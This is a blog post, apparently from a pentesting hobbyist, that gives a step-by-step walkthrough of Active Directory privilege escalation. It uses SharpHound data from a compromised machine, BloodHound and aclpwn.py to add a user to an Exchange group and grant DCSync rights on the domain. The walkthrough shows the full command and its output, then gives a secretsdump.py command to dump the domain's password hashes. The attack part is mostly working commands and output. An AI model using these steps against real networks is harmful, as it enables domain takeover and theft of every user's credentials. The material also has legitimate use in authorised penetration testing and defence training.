How to exploit Active Directory ACL based privilege escalation path with Bloodhound and aclpwn.py. Then collect the hashes, if you are lucky to get that level of access with secretdump.py #kali #kalilinux #hacking #pentest #pentesting #redteam

This was done from Kali box. Of course the Sharphound was ran on a compromised computer.

Used application
Bloodhound and Sharphound ( https://github.com/BloodHoundAD/SharpHound )
aclpwn ( https://github.com/fox-it/aclpwn.py )

Steps to do it

  1. Get output with sharphound and put that on our kali box use -all when run the Sharphound.
  2. Start neo4j and bloodhound
  3. import the output from Sharphound

You can look for path to elevate you access manually or do it with a python script.

After you neo4j running download aclpwn and run it. It will look in the neo4j database.

Command:

python ./aclpwn.py -f roger@test.local -t -d test.local -s 172.10.10.212 -du neo4j -dp neo4j
Please supply the password or LM:NTLM hashes of the account you are escalating from: 
[+] Path found!
Path [0]: (roger@test.local)-[MemberOf]->(SERVICE ACCOUNTS@test.local)-[MemberOf]->(PRIVILEGED IT ACCOUNTS@test.local)-[MemberOf]->(ACCOUNT OPERATORS@test.local)-[GenericAll]->(EXCHANGE TRUSTED SUBSYSTEM@test.local)-[MemberOf]->(EXCHANGE WINDOWS PERMISSIONS@test.local)-[WriteDacl]->(test.local)
[+] Path found!
Path [1]: (roger@test.local)-[MemberOf]->(SERVICE ACCOUNTS@test.local)-[MemberOf]->(PRIVILEGED IT ACCOUNTS@test.local)-[MemberOf]->(ACCOUNT OPERATORS@test.local)-[GenericAll]->(EXCHANGE WINDOWS PERMISSIONS@test.local)-[WriteDacl]->(test.local)
Please choose a path [0-1] 1
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user roger to group EXCHANGE WINDOWS PERMISSIONS@test.local
[+] Added CN=roger,DC=test,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=test,DC=local
[-] Re-binding to LDAP to refresh group memberships of roger@test.local
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to roger
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-2020021-12343.restore

 

If you have the access you can dump the hashes.

secretsdump.py -dc-ip 172.10.10.212 -history test.local/roger@172.10.10.212

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.